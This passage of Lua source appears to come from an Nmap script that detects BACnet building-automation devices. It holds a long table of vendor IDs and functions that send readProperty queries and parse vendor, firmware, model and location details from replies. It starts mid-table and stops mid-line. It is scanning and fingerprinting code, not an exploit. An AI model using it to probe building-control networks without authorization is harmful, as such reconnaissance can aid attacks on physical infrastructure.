Corporation\",\n [665] = \"Senva Inc.\",\n [667] = \"FM-Tec\",\n [668] = \"Systems Specialists Inc.\",\n [669] = \"SenseAir\",\n [670] = \"AB IndustrieTechnik Srl\",\n [671] = \"Cortland Research LLC\",\n [672] = \"MediaView\",\n [673] = \"VDA Elettronica\",\n [674] = \"CSS Inc.\",\n [675] = \"Tek-Air Systems Inc.\",\n [676] = \"ICDT\",\n [677] = \"The Armstrong Monitoring Corporation\",\n [678] = \"DIXELL S.r.l\",\n [679] = \"Lead System Inc.\",\n [680] = \"ISM EuroCenter S.A.\",\n [681] = \"TDIS\",\n [682] = \"Trade FIDES\",\n [683] = \"Kn\u00fcbH (Emerson Network Power)\",\n [684] = \"Resource Data Management\",\n [685] = \"Abies Technology Inc.\",\n [686] = \"Amalva\",\n [687] = \"MIRAE Electrical Mfg. Co. Ltd.\",\n [688] = \"HunterDouglas Architectural Projects Scandinavia ApS\",\n [689] = \"RUNPAQ Group Co.Ltd\",\n [690] = \"Unicard SA\",\n [691] = \"IE Technologies\",\n [692] = \"Ruskin Manufacturing\",\n [693] = \"Calon Associates Limited\",\n [694] = \"Contec Co. 
Ltd.\",\n [695] = \"iT GmbH\",\n [696] = \"Autani Corporation\",\n [697] = \"Christian Fortin\",\n [698] = \"HDL\",\n [699] = \"IPID Sp. Z.O.O Limited\",\n [700] = \"Fuji Electric Co.Ltd\",\n [701] = \"View Inc.\",\n [702] = \"Samsung S1 Corporation\",\n [703] = \"New Lift\",\n [704] = \"VRT Systems\",\n [705] = \"Motion Control Engineering Inc.\",\n [706] = \"Weiss Klimatechnik GmbH\",\n [707] = \"Elkon\",\n [708] = \"Eliwell Controls S.r.l.\",\n [709] = \"Japan Computer Technos Corp\",\n [710] = \"Rational Network ehf\",\n [711] = \"Magnum Energy Solutions LLC\",\n [712] = \"MelRok\",\n [713] = \"VAE Group\",\n [714] = \"LGCNS\",\n [715] = \"Berghof Automationstechnik GmbH\",\n [716] = \"Quark Communications Inc.\",\n [717] = \"Sontex\",\n [718] = \"mivune AG\",\n [719] = \"Panduit\",\n [720] = \"Smart Controls LLC\",\n [721] = \"Compu-Aire Inc.\",\n [722] = \"Sierra\",\n [723] = \"ProtoSense Technologies\",\n [724] = \"Eltrac Technologies Pvt Ltd\",\n [725] = \"Bektas Invisible Controls GmbH\",\n [726] = \"Entelec\",\n [727] = \"Innexiv\",\n [728] = \"Covenant\",\n [729] = \"Davitor AB\",\n [730] = \"TongFang Technovator\",\n [731] = \"Building Robotics\",\n [732] = \"HSS-MSR UG\",\n [733] = \"FramTack LLC\",\n [734] = \"B. L. 
Acoustics\",\n [735] = \"Traxxon Rock Drills\",\n [736] = \"Franke\",\n [737] = \"Wurm GmbH & Co\",\n [738] = \"AddENERGIE\",\n [739] = \"Mirle Automation Corporation\",\n [740] = \"Ibis Networks\",\n [741] = \"ID-KARTA s.r.o.\",\n [742] = \"Anaren\",\n [743] = \"Span\",\n [744] = \"Bosch Thermotechnology Corp\",\n [745] = \"DRC Technology S.A.\",\n [746] = \"Shanghai Energy Building Technology Co\",\n [747] = \"Fraport AG\",\n [748] = \"Flowgroup\",\n [749] = \"Skytron Energy\",\n [750] = \"ALTEL Wicha\",\n [751] = \"Drupal\",\n [752] = \"Axiomatic Technology\",\n [753] = \"Bohnke + Partner\",\n [754] = \"Function 1\",\n [755] = \"Optergy Pty\",\n [756] = \"LSI Virticus\",\n [757] = \"Konzeptpark GmbH\",\n [758] = \"Hubbell Building Automation\",\n [759] = \"eCurv\",\n [760] = \"Agnosys GmbH\",\n [761] = \"Shanghai Sunfull Automation Co.\",\n [762] = \"Kurz Instruments\",\n [763] = \"Cias Elettronica S.r.l.\",\n [764] = \"Multiaqua\",\n [765] = \"BlueBox\",\n [766] = \"Sensidyne\",\n [767] = \"Viessmann Elektronik GmbH\",\n [768] = \"ADFweb.com srl\",\n [769] = \"Gaylord Industries\",\n [770] = \"Majur Ltd.\",\n [771] = \"Shanghai Huilin Technology Co.\",\n [772] = \"Exotronic\",\n [773] = \"Safecontrol spol s.r.o.\",\n [774] = \"Amatis\",\n [775] = \"Universal Electric Corporation\",\n [776] = \"iBACnet\",\n [778] = \"Smartrise Engineering\",\n [779] = \"Miratron\",\n [780] = \"SmartEdge\",\n [781] = \"Mitsubishi Electric Australia Pty Ltd\",\n [782] = \"Triangle Research International Ptd Ltd\",\n [783] = \"Produal Oy\",\n [784] = \"Milestone Systems A/S\",\n [785] = \"Trustbridge\",\n [786] = \"Feedback Solutions\",\n [787] = \"IES\",\n [788] = \"GE Critical Power\",\n [789] = \"Riptide IO\",\n [790] = \"Messerschmitt Systems AG\",\n [791] = \"Dezem Energy Controlling\",\n [792] = \"MechoSystems\",\n [793] = \"evon GmbH\",\n [794] = \"CS Lab GmbH\",\n [795] = \"8760 Enterprises\",\n [796] = \"Touche Controls\",\n [797] = \"Ontrol Teknik Malzeme San. ve Tic. 
A.S.\",\n [798] = \"Uni Control System Sp. Z o.o.\",\n [799] = \"Weihai Ploumeter Co.\",\n [800] = \"Elcom International Pvt. Ltd\",\n [801] = \"Philips Lighting\",\n [802] = \"AutomationDirect\",\n [803] = \"Paragon Robotics\",\n [804] = \"SMT System & Modules Technology AG\",\n [805] = \"OS Technology Service and Trading Co.\",\n [806] = \"CMR Controls Ltd\",\n [807] = \"Innovari\",\n [808] = \"ABB Control Products\",\n [809] = \"Gesellschaft fur Gebaudeautomation mbH\",\n [810] = \"RODI Systems Corp.\",\n [811] = \"Nextek Power Systems\",\n [812] = \"Creative Lighting\",\n [813] = \"WaterFurnace International\",\n [814] = \"Mercury Security\",\n [815] = \"Hisense (Shandong) Air-Conditioning Co.\",\n [816] = \"Layered Solutions\",\n [817] = \"Leegood Automatic System\",\n [818] = \"Shanghai Restar Technology Co.\",\n [819] = \"Reimann Ingenieurburo\",\n [820] = \"LynTec\",\n [821] = \"HTP\",\n [822] = \"Elkor Technologies\",\n [823] = \"Bentrol Pty Ltd\",\n [824] = \"Team-Control Oy\",\n [825] = \"NextDevice\",\n [826] = \"GLOBAL CONTROL 5 Sp. z o.o.\",\n [827] = \"King I Electronics Co.\",\n [828] = \"SAMDAV\",\n [829] = \"Next Gen Industries Pvt. Ltd.\",\n [830] = \"Entic LLC\",\n [831] = \"ETAP\",\n [832] = \"Moralle Electronics Limited\",\n [833] = \"Leicom AG\",\n [834] = \"Watts Regulator Company\",\n [835] = \"S.C. Orbtronics S.R.L.\",\n [836] = \"Gaussan Technologies\",\n [837] = \"WEBfactory GmbH\",\n [838] = \"Ocean Controls\",\n [839] = \"Messana Air-Ray Conditioning s.r.l.\",\n [840] = \"Hangzhou BATOWN Technology Co. Ltd.\",\n [841] = \"Reasonable Controls\",\n [842] = \"Servisys\",\n [843] = \"halstrup-walcher GmbH\",\n [844] = \"SWG Automation Fuzhou Limited\",\n [845] = \"KSB Aktiengesellschaft\",\n [846] = \"Hybryd Sp. z o.o.\",\n [847] = \"Helvatron AG\",\n [848] = \"Oderon Sp. 
Z.O.O.\",\n [849] = \"miko\",\n [850] = \"Exodraft\",\n [851] = \"Hochhuth GmbH\",\n [852] = \"Integrated System Technologies Ltd.\",\n [853] = \"Shanghai Cellcons Controls Co., Ltd\",\n [854] = \"Emme Controls, LLC\",\n [855] = \"Field Diagnostic Services, Inc.\",\n [856] = \"Ges Teknik A.S.\",\n [857] = \"Global Power Products, Inc.\",\n [858] = \"Option NV\",\n [859] = \"BV-Control AG\",\n [860] = \"Sigren Engineering AG\",\n [861] = \"Shanghai Jaltone Technology Co., Ltd.\",\n [862] = \"MaxLine Solutions Ltd\",\n [863] = \"Kron Instrumentos El\u00e9tricos Ltda\",\n [864] = \"Thermo Matrix\",\n [865] = \"Infinite Automation Systems, Inc.\",\n [866] = \"Vantage\",\n [867] = \"Elecon Measurements Pvt Ltd\",\n [868] = \"TBA\",\n [869] = \"Carnes Company\",\n [870] = \"Harman Professional\",\n [871] = \"Nenutec Asia Pacific Pte Ltd\",\n [872] = \"Gia NV\",\n [873] = \"Kepware Tehnologies\",\n [874] = \"Temperature Electronics Ltd\",\n [875] = \"Packet Power\",\n [876] = \"Project Haystack Corporation\",\n [877] = \"DEOS Controls Americas Inc.\",\n [878] = \"Senseware Inc\",\n [879] = \"MST Systemtechnik AG\",\n [880] = \"Lonix Ltd\",\n [881] = \"GMC-I Messtechnik GmbH\",\n [882] = \"Aviosys International Inc.\",\n [883] = \"Efficient Building Automation Corp.\",\n [884] = \"Accutron Instruments Inc.\",\n [885] = \"Vermont Energy Control Systems LLC\",\n [886] = \"DCC Dynamics\",\n [887] = \"B.E.G. Br\u00fcck Electronic GmbH\",\n [889] = \"NGBS Hungary Ltd.\",\n [890] = \"ILLUM Technology, LLC\",\n [891] = \"Delta Controls Germany Limited\",\n [892] = \"S+T Service & Technique S.A.\",\n [893] = \"SimpleSoft\",\n [894] = \"Altair Engineering\",\n [895] = \"EZEN Solution Inc.\",\n [896] = \"Fujitec Co. 
Ltd.\",\n [897] = \"Terralux\",\n [898] = \"Annicom\",\n [899] = \"Bihl+Wiedemann GmbH\",\n [900] = \"Draper, Inc.\",\n [901] = \"Sch\u00fcco International KG\",\n [902] = \"Otis Elevator Company\",\n [903] = \"Fidelix Oy\",\n [904] = \"RAM GmbH Mess- und Regeltechnik\",\n [905] = \"WEMS\",\n [906] = \"Ravel Electronics Pvt Ltd\",\n [907] = \"OmniMagni\",\n [908] = \"Echelon\",\n [909] = \"Intellimeter Canada, Inc.\",\n [910] = \"Bithouse Oy\",\n [912] = \"BuildPulse\",\n [913] = \"Shenzhen 1000 Building Automation Co. Ltd\",\n [914] = \"AED Engineering GmbH\",\n [915] = \"G\u00fcntner GmbH & Co. KG\",\n [916] = \"KNXlogic\",\n [917] = \"CIM Environmental Group\",\n [918] = \"Flow Control\",\n [919] = \"Lumen Cache, Inc.\",\n [920] = \"Ecosystem\",\n [921] = \"Potter Electric Signal Company, LLC\",\n [922] = \"Tyco Fire & Security S.p.A.\",\n [923] = \"Watanabe Electric Industry Co., Ltd.\",\n [924] = \"Causam Energy\",\n [925] = \"W-tec AG\",\n [926] = \"IMI Hydronic Engineering International SA\",\n [927] = \"ARIGO Software\",\n [928] = \"MSA Safety\",\n [929] = \"Smart Solucoes Ltda - MERCATO\",\n [930] = \"PIATRA Engineering\",\n [931] = \"ODIN Automation Systems, LLC\",\n [932] = \"Belparts NV\",\n [933] = \"UAB, SALDA\",\n [934] = \"Alre-IT Regeltechnik GmbH\",\n [935] = \"Ingenieurb\u00fcro H. Lertes GmbH & Co. KG\",\n [936] = \"Breathing Buildings\",\n [937] = \"eWON SA\",\n [938] = \"Cav. Uff. Giacomo Cimberio S.p.A\",\n [939] = \"PKE Electronics AG\",\n [940] = \"Allen\",\n [941] = \"Kastle Systems\",\n [942] = \"Logical Electro-Mechanical (EM) Systems, Inc.\",\n [943] = \"ppKinetics Instruments, LLC\",\n [944] = \"Cathexis Technologies\",\n [945] = \"Sylop sp. Z o.o. 
sp.k\",\n [946] = \"Brauns Control GmbH\",\n [947] = \"Omron Corporation\",\n [948] = \"Wildeboer Bauteile Gmbh\",\n [949] = \"Shanghai Biens Technologies Ltd\",\n [950] = \"Beijing HZHY Technology Co., Ltd\",\n [951] = \"Building Clouds\",\n [952] = \"The University of Sheffield-Department of Electronic and Electrical Engineering\",\n [953] = \"Fabtronics Australia Pty Ltd\",\n [954] = \"SLAT\",\n [955] = \"Software Motor Corporation\",\n [956] = \"Armstrong International Inc.\",\n [957] = \"Steril-Aire, Inc.\",\n [958] = \"Infinique\",\n [959] = \"Arcom\",\n [960] = \"Argo Performance, Ltd\",\n [961] = \"Dialight\",\n [962] = \"Ideal Technical Solutions\",\n [963] = \"Neurobat AG\",\n [964] = \"Neyer Software Consulting LLC\",\n [965] = \"SCADA Technology Development Co., Ltd.\",\n [966] = \"Demand Logic Limited\",\n [967] = \"GWA Group Limited\",\n [968] = \"Occitaline\",\n [969] = \"NAO Digital Co., Ltd.\",\n [970] = \"Shenzhen Chanslink Network Technology Co., Ltd.\",\n [971] = \"Samsung Electronics Co., Ltd.\",\n [972] = \"Mesa Laboratories, Inc.\",\n [973] = \"Fischer\",\n [974] = \"OpSys Solutions Ltd.\",\n [975] = \"Advanced Devices Limited\",\n [976] = \"Condair\",\n [977] = \"INELCOM Ingenieria Electronica Comercial S.A.\",\n [978] = \"GridPoint, Inc.\",\n [979] = \"ADF Technologies Sdn Bhd\",\n [980] = \"EPM, Inc.\",\n [981] = \"Lighting Controls Ltd\",\n [982] = \"Perix Controls Ltd.\",\n [983] = \"AERCO International, Inc.\",\n [984] = \"KONE Inc.\",\n [985] = \"Ziehl-Abegg SE\",\n [986] = \"Robot, S.A.\",\n [987] = \"Optigo Networks, Inc.\",\n [988] = \"Openmotics BVBA\",\n [989] = \"Metropolitan Industries, Inc.\",\n [990] = \"Huawei Technologies Co., Ltd.\",\n [991] = \"OSRAM Sylvania, Inc.\",\n [992] = \"Vanti\",\n [993] = \"Cree Lighting\",\n [994] = \"Richmond Heights SDN BHD\",\n [995] = \"Payne-Sparkman Lighting Mangement\",\n [996] = \"Ashcroft\",\n [997] = \"Jet Controls Corp\",\n [998] = \"Zumtobel Lighting GmbH\",\n [1000] = \"Ekon 
GmbH\",\n [1001] = \"Molex\",\n [1002] = \"Maco Lighting Pty Ltd.\",\n [1003] = \"Axecon Corp.\",\n [1004] = \"Tensor plc\",\n [1005] = \"Kaseman Environmental Control Equipment (Shanghai) Limited\",\n [1006] = \"AB Axis Industries\",\n [1007] = \"Netix Controls\",\n [1008] = \"Eldridge Products, Inc.\",\n [1009] = \"Micronics\",\n [1010] = \"Fortecho Solutions Ltd\",\n [1011] = \"Sellers Manufacturing Company\",\n [1012] = \"Rite-Hite Doors, Inc.\",\n [1013] = \"Violet Defense LLC\",\n [1014] = \"Simna\",\n [1015] = \"Multi-\u00c9nergie Best Inc.\",\n [1016] = \"Mega System Technologies, Inc.\",\n [1017] = \"Rheem\",\n [1018] = \"Ing. Punzenberger COPA-DATA GmbH\",\n [1019] = \"MEC Electronics GmbH\",\n [1020] = \"Taco Comfort Solutions\",\n [1021] = \"Alexander Maier GmbH\",\n [1022] = \"Ecorithm, Inc.\",\n [1023] = \"Accurro Ltd\",\n [1024] = \"ROMTECK Australia Pty Ltd\",\n [1025] = \"Splash Monitoring Limited\",\n [1026] = \"Light Application\",\n [1027] = \"Logical Building Automation\",\n [1028] = \"Exilight Oy\",\n [1029] = \"Hager Electro SAS\",\n [1030] = \"KLIF Co., LTD\",\n [1031] = \"HygroMatik\",\n [1032] = \"Daniel Mousseau Programmation & Electronique\",\n [1033] = \"Aerionics Inc.\",\n [1034] = \"M2S Electronique Ltee\",\n [1035] = \"Automation Components, Inc.\",\n [1036] = \"Niobrara Research & Development Corporation\",\n [1037] = \"Netcom Sicherheitstechnik GmbH\",\n [1038] = \"Lumel S.A.\",\n [1039] = \"Great Plains Industries, Inc.\",\n [1040] = \"Domotica Labs S.R.L\",\n [1041] = \"Energy Cloud, Inc.\",\n [1042] = \"Vomatec\",\n [1043] = \"Demma Companies\",\n [1044] = \"Valsena\",\n [1045] = \"Comsys B\u00e4rtsch AG\",\n [1046] = \"bGrid\",\n [1047] = \"MDJ Software Pty Ltd\",\n [1048] = \"Dimonoff, Inc.\",\n [1049] = \"Edomo Systems, GmbH\",\n [1050] = \"Effektiv, LLC\",\n [1051] = \"SteamOVap\",\n [1052] = \"grandcentrix GmbH\",\n [1053] = \"Weintek Labs, Inc.\",\n [1054] = \"Intefox GmbH\",\n [1055] = \"Radius22 Automation Company\",\n 
[1056] = \"Ringdale, Inc.\",\n [1057] = \"Iwaki America\",\n [1058] = \"Bractlet\",\n [1059] = \"STULZ Air Technology Systems, Inc.\",\n [1060] = \"Climate Ready Engineering Pty Ltd\",\n [1061] = \"Genea Energy Partners\",\n [1062] = \"IoTall Chile\",\n [1063] = \"IKS Co., Ltd.\",\n [1064] = \"Yodiwo AB\",\n [1065] = \"TITAN electronic GmbH\",\n [1066] = \"IDEC Corporation\",\n [1067] = \"SIFRI SL\",\n [1068] = \"Thermal Gas Systems Inc.\",\n [1069] = \"Building Automation Products, Inc.\",\n [1070] = \"Asset Mapping\",\n [1071] = \"Smarteh Company\",\n [1072] = \"Datapod Australia Pty Ltd.\",\n [1073] = \"Buildings Alive Pty Ltd\",\n [1074] = \"Digital Elektronik\",\n [1075] = \"Talent Automa\u00e7\u00e3o e Tecnologia Ltda\",\n [1076] = \"Norposh Limited\",\n [1077] = \"Merkur Funksysteme AG\",\n [1078] = \"Faster CZ spol. S.r.o\",\n [1079] = \"Eco-Adapt\",\n [1080] = \"Energocentrum Plus, s.r.o\",\n [1081] = \"amBX UK Ltd\",\n [1082] = \"Western Reserve Controls, Inc.\",\n [1083] = \"LayerZero Power Systems, Inc.\",\n [1084] = \"CIC Jan H\u0159ebec s.r.o.\",\n [1085] = \"Sigrov BV\",\n [1086] = \"ISYS-Intelligent Systems\",\n [1087] = \"Gas Detection (Australia) Pty Ltd\",\n [1088] = \"Kinco Automation (Shanghai) Ltd.\",\n [1089] = \"Lars Energy, LLC\",\n [1090] = \"Flamefast (UK) Ltd.\",\n [1091] = \"Royal Service Air Conditioning\",\n [1092] = \"Ampio Sp. 
Z o.o.\",\n [1093] = \"Inovonics Wireless Corporation\",\n [1094] = \"Nvent Thermal Management\",\n [1095] = \"Sinowell Control System Ltd\",\n [1096] = \"Moxa Inc.\",\n [1097] = \"Matrix iControl SDN BHD\",\n [1098] = \"PurpleSwift\",\n [1099] = \"OTIM Technologies\",\n [1100] = \"FlowMate Limited\",\n [1101] = \"Degree Controls, Inc.\",\n [1102] = \"Fei Xing (Shanghai) Software Technologies Co., Ltd.\",\n [1103] = \"Berg GmbH\",\n [1104] = \"ARENZ.IT\",\n [1105] = \"Edelstrom Electronic Devices & Designing LLC\",\n [1106] = \"Drive Connect, LLC\",\n [1107] = \"DevelopNow\",\n [1108] = \"Poort\",\n [1109] = \"VMEIL Information (Shanghai) Ltd\",\n [1110] = \"Rayleigh Instruments\",\n [1112] = \"CODESYS Development\",\n [1113] = \"Smartware Technologies Group, LLC\",\n [1114] = \"Polar Bear Solutions\",\n [1115] = \"Codra\",\n [1116] = \"Pharos Architectural Controls Ltd\",\n [1117] = \"EngiNear Ltd.\",\n [1118] = \"Ad Hoc Electronics\",\n [1119] = \"Unified Microsystems\",\n [1120] = \"Industrieelektronik Brandenburg GmbH\",\n [1121] = \"Hartmann GmbH\",\n [1122] = \"Piscada\",\n [1123] = \"KMB systems, s.r.o.\",\n [1124] = \"PowerTech Engineering AS\",\n [1125] = \"Telefonbau Arthur Schwabe GmbH & Co. 
KG\",\n [1126] = \"Wuxi Fistwelove Technology Co., Ltd.\",\n [1127] = \"Prysm\",\n [1128] = \"STEINEL GmbH\",\n [1129] = \"Georg Fischer JRG AG\",\n [1130] = \"Make Develop SL\",\n [1131] = \"Monnit Corporation\",\n [1132] = \"Mirror Life Corporation\",\n [1133] = \"Secure Meters Limited\",\n [1134] = \"PECO\",\n [1135] = \".CCTECH, Inc.\",\n [1136] = \"LightFi Limited\",\n [1137] = \"Nice Spa\",\n [1138] = \"Fiber SenSys, Inc.\",\n [1139] = \"B&D Buchta und Degeorgi\",\n [1140] = \"Ventacity Systems, Inc.\",\n [1141] = \"Hitachi-Johnson Controls Air Conditioning, Inc.\",\n [1142] = \"Sage Metering, Inc.\",\n [1143] = \"Andel Limited\",\n [1144] = \"ECOSmart Technologies\",\n [1145] = \"S.E.T.\",\n [1146] = \"Protec Fire Detection Spain SL\",\n [1147] = \"AGRAMER UG\",\n [1148] = \"Anylink Electronic GmbH\",\n [1149] = \"Schindler, Ltd\",\n [1150] = \"Jibreel Abdeen Est.\",\n [1151] = \"Fluidyne Control Systems Pvt. Ltd\",\n [1152] = \"Prism Systems, Inc.\",\n [1153] = \"Enertiv\",\n [1154] = \"Mirasoft GmbH & Co. 
KG\",\n [1155] = \"DUALTECH IT\",\n [1156] = \"Countlogic, LLC\",\n [1157] = \"Kohler\",\n [1158] = \"Chen Sen Controls Co., Ltd.\",\n [1159] = \"Greenheck\",\n [1160] = \"Intwine Connect, LLC\",\n [1161] = \"Karlborgs Elkontroll\",\n [1162] = \"Datakom\",\n [1163] = \"Hoga Control AS\",\n [1164] = \"Cool Automation\",\n [1165] = \"Inter Search Co., Ltd\",\n [1166] = \"DABBEL-Automation Intelligence GmbH\",\n [1167] = \"Gadgeon Engineering Smartness\",\n [1168] = \"Coster Group S.r.l.\",\n [1169] = \"Walter M\u00fcller AG\",\n [1170] = \"Fluke\",\n [1171] = \"Quintex Systems Ltd\",\n [1172] = \"Senfficient SDN BHD\",\n [1173] = \"Nube iO Operations Pty Ltd\",\n [1174] = \"DAS Integrator Pte Ltd\",\n [1175] = \"CREVIS Co., Ltd\",\n [1176] = \"iSquared software inc.\",\n [1177] = \"KTG GmbH\",\n [1178] = \"POK Group Oy\",\n [1179] = \"Adiscom\",\n [1180] = \"Incusense\",\n [1181] = \"75F\",\n [1182] = \"Anord Mardix, Inc.\",\n [1183] = \"HOSCH Geb\u00e4udeautomation Neue Produkte GmbH\",\n [1184] = \"BOSCH Software Innovations GmbH\",\n [1185] = \"Royal Boon Edam International B.V.\",\n [1186] = \"Clack Corporation\",\n [1187] = \"Unitex Controls LLC\",\n [1188] = \"KTC G\u00f6teborg AB\",\n [1189] = \"Interzon AB\",\n [1190] = \"ISDE ING SL\",\n [1191] = \"ABM automation building messaging GmbH\",\n [1192] = \"Kentec Electronics Ltd\",\n [1193] = \"Emerson Commercial and Residential Solutions\",\n [1194] = \"Powerside\",\n [1195] = \"SMC Group\",\n [1196] = \"EOS Weather Instruments\",\n [1197] = \"Zonex Systems\",\n [1198] = \"Generex Systems Computervertriebsgesellschaft mbH\",\n [1199] = \"Energy Wall LLC\",\n [1200] = \"Thermofin\",\n [1201] = \"SDATAWAY SA\",\n [1202] = \"Biddle Air Systems Limited\",\n [1203] = \"Kessler Ellis Products\",\n [1204] = \"Thermoscreens\",\n [1205] = \"Modio\",\n [1206] = \"Newron Solutions\",\n [1207] = \"Unitronics\",\n [1208] = \"TRILUX GmbH & Co. 
KG\",\n [1209] = \"Kollmorgen Steuerungstechnik GmbH\",\n [1210] = \"Bosch Rexroth AG\",\n [1211] = \"Alarko Carrier\",\n [1212] = \"Verdigris Technologies\"\n}\n--return vendor information\nfunction vendor_lookup(vennum)\n local vendorname = vendor_id[vennum] or \"Unknown Vendor Number\"\n return string.format(\"%s (%d)\", vendorname, vennum)\nend\n\n---\n-- Function to lookup the length of the Field to be used for Vendor ID, Firmware\n-- Object Name, Software Version, and Location. It will then return the Value\n-- that is stored inside the packet for this information as a String Value.\n-- The field is located in the 18th byte of the data field of a valid packet.\n-- Depending on this field the information will be stored in field 20 + length\n-- or in field 22 + length.\n--\n-- @param packet The packet that was received and is ready to be parsed\nfunction field_size(packet)\n -- read the Length field from the packet data byte 18\n local offset\n -- Verify the field from byte 18 to determine if the vendor number is one byte or two bytes?\n local value = string.byte(packet, 18)\n if ( value % 0x10 < 5 ) then\n value = value % 0x10 - 1\n offset = 19\n else\n value = string.byte(packet, 19) - 1\n offset = 20\n end\n -- unpack a string of length <value>\n local charset, info\n charset, info, offset = string.unpack(\"Bc\" .. 
tostring(value), packet, offset)\n -- return information that was found in the packet\n if charset == 0 then -- UTF-8\n return info\n elseif charset == 4 then -- UCS-2 big-endian\n return unicode.transcode(info, unicode.utf16_dec, unicode.utf8_enc, true, nil)\n else -- TODO: other encodings not supported by unicode.lua\n return info\n end\nend\n\n---\n-- Function to set the nmap output for the host, if a valid BACNet packet\n-- is received then the output will show that the port is open instead of\n-- <code>open|filtered</code>\n--\n-- @param host Host that was passed in via nmap\n-- @param port port that BACNet is running on (Default UDP/47808)\nfunction set_nmap(host, port)\n\n --set port Open\n port.state = \"open\"\n -- set version name to BACNet\n port.version.name = \"bacnet\"\n nmap.set_port_version(host, port)\n nmap.set_port_state(host, port, \"open\")\n\nend\n\n--- Sends a query for Property Identifier id (a number) on socket\nlocal function send_query(socket, id)\n -- Wireshark dissection:\n local query = string.pack(\">BB I2 BBBBBBB I4 BB\",\n 0x81, -- Type: BACnet/IP (Annex J)\n 0x0a, -- Function: Original-Unicast-NPDU\n 0x0011, -- BVLC-Length: 4 of 17 bytes\n -- BACnet NPDU\n 0x01, -- Version: 0x01 (ASHRAE 135-1995)\n 0x04, -- Control (expecting reply)\n -- BACnet APDU\n 0x00, -- APDU Type: Confirmed-REQ, PDU flags: 0x0\n 0x05, -- Max response segments unspecified, Max APDU size: 1476 octets\n 0x01, -- Invoke ID: 1\n 0x0c, -- Service Choice: readProperty\n 0x0c, -- Context-specific tag, number 0, Length Value Type 4\n 0x023fffff, -- Object Type: device; instance number 4194303\n 0x19, -- Context-specific tag, number 1, Length Value Type 1\n id)\n return socket:send(query)\nend\n\nlocal query_codes = {\n firmware = 0x2c,\n application = 0x0c,\n model = 0x46,\n object = 0x4d,\n object_id = 0x4b,\n description = 0x1c,\n location = 0x3a,\n vendor = 0x79,\n vendor_id = 0x78\n}\n---\n-- Function to send a query to the discovered BACNet devices. 
This will pull extra\n-- information to help identify the device. Information such as firmware, application software\n-- object name, description, and location parameters configured inside of the device.\n--\n-- @param socket The socket that was created in the action function\n-- @param type Type is the type of packet to send, this can be firmware, application, object, description, or location\nfunction standard_query(socket, type)\n\n -- determine what type of packet to send\n local query = query_codes[type]\n assert(query) -- table lookup must not fail.\n\n --try to pull the information\n local status, result = send_query(socket, query)\n if(status == false) then\n stdnse.debug1(\"Socket error sending query: %s\", result)\n return nil\n end\n -- receive packet from response\n local rcvstatus, response = socket:receive()\n if(rcvstatus == false) then\n stdnse.debug1(\"Socket error receiving: %s\", response)\n return nil\n end\n -- validate valid BACNet Packet\n if( string.byte(response, 1) == 0x81 ) then\n -- Lookup byte 7 (packet type)\n local value = string.byte(response, 7)\n -- verify that the response packet was not an error packet\n if( value ~= 0x50) then\n --collect information by looping thru the packet\n return field_size(response)\n -- if it was an error packet, set the string to error for later purposes\n else\n stdnse.debug1(\"Error receiving: BACNet Error\")\n return nil\n end\n -- else ERROR\n else\n stdnse.debug1(\"Error receiving Vendor ID: Invalid BACNet packet\")\n return nil\n end\n\nend\n---\n-- Function to send a query to the discovered BACNet devices. This function queries extra\n-- information to help identify the device. 
Vendor ID query is sent with this\n-- function and the Vendor ID number is parsed out of the packet.\n--\n-- @param socket The socket that was created in the action function\nfunction vendornum_query(socket)\n\n -- set the vendor query data for sending\n local vendor_query = query_codes.vendor_id\n assert(vendor_query)\n\n --send the vendor information\n local status, result = send_query(socket, vendor_query)\n if(status == false) then\n stdnse.debug1(\"Socket error sending vendor query: %s\", result)\n return nil\n end\n -- receive vendor information packet\n local rcvstatus, response = socket:receive()\n if(rcvstatus == false) then\n stdnse.debug1(\"Socket error receiving vendor query: %s\", response)\n return nil\n end\n -- validate valid BACNet Packet\n if( string.byte(response, 1) == 0x81 ) then\n local value = string.byte(response, 7)\n --if the vendor query resulted in an error\n if( value ~= 0x50) then\n -- read values for byte 18 in the packet data\n -- this value determines if vendor number is 1 or 2 bytes\n value = string.byte(response, 18)\n else\n stdnse.debug1(\"Error receiving Vendor ID: BACNet Error\")\n return nil\n end\n -- if value is 21 (byte 18)\n if( value == 0x21 ) then\n -- convert hex to decimal\n local vendornum = string.byte(response, 19)\n -- look up vendor name from table\n return vendor_lookup(vendornum)\n -- if value is 22 (byte 18)\n elseif( value == 0x22 ) then\n -- convert hex to decimal\n local vendornum = string.unpack(\">I2\", response, 19)\n -- look up vendor name from table\n return vendor_lookup(vendornum)\n else\n -- set return value to an Error if byte 18 was not 21/22\n stdnse.debug1(\"Error receiving Vendor ID: Invalid BACNet packet\")\n return nil\n end\n end\n\nend\n\n---\n-- Action Function that is used to run the NSE. This function will send the initial query to the\n-- host and port that were passed in via nmap. The initial response is parsed to determine if host\n-- is a BACNet device. 
If it is then more actions are taken to gather extra information.\n--\n-- @param host Host that was scanned via nmap\n-- @param port port that was scanned via nmap\naction = function(host, port)\n --set the first query data for sending\n local orig_query = query_codes.object_id\n assert(orig_query)\n local to_return = nil\n\n -- create new socket\n local sock = nmap.new_socket()\n -- Bind to port for niceness with BACNet this may need to be commented out if\n -- scanning more than one host at a time, may fix some issues seen on Windows\n --\n local status, err = sock:bind(nil, port.number)\n if(status == false) then\n stdnse.debug1(\"Couldn't bind to %s/udp. Continuing anyway, results may vary\", port.number)\n end\n -- connect to the remote host\n local constatus, conerr = sock:connect(host, port)\n if not constatus then\n stdnse.debug1('Error establishing a UDP connection for %s - %s', host, conerr)\n return nil\n end\n -- send the original query to see if it is a valid BACNet Device\n local sendstatus, senderr = send_query(sock, orig_query)\n if not sendstatus then\n stdnse.debug1('Error sending BACNet request to %s:%d - %s', host.ip, port.number, senderr)\n return nil\n end\n\n -- receive response\n local rcvstatus, response = sock:receive()\n if(rcvstatus == false) then\n stdnse.debug1(\"Receive error: %s\", response)\n return nil\n end\n\n -- if the response starts with 0x81 then its BACNet\n if( string.byte(response, 1) == 0x81 ) then\n local value = string.byte(response, 7)\n --if the first query resulted in an error\n --\n if( value == 0x50) then\n -- set the nmap output for the port and version\n set_nmap(host, port)\n -- return that BACNet Error was received\n to_return = \"\\nBACNet ADPU Type: Error (5) \\n\\t\" .. 
